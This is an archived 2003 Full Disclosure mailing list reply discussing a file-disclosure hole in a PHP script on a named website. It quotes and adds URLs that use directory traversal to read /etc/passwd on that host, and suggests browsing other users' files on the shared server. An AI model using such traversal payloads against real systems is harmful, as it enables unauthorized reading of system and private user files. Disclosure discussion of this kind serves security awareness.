Full Disclosure mailing list archives

Re: http://xfteam.net/fedor.c - Anyone seen this before??


From: Dan <dan () lockedbox net>
Date: Mon, 24 Nov 2003 11:50:36 +0000

"kang () insecure ws" <kang () insecure ws> wrote:

hum
i forgot stuff liek that:

http://xfteam.net/remote.php?&c=v&d=%2Fhome%2Fxfteam%2Fpublic_html%2F&f=../../../etc/passwd

well better stop ere before spamming (too late, k)

hf

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


You could allways just try:
http://www.xfteam.net/remote.php?&c=v&d=%2Fetc%2F&f=passwd

or start browsing the other users public_html dirs on that shared hosting
box...

Regards,
Daniel.




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Current thread: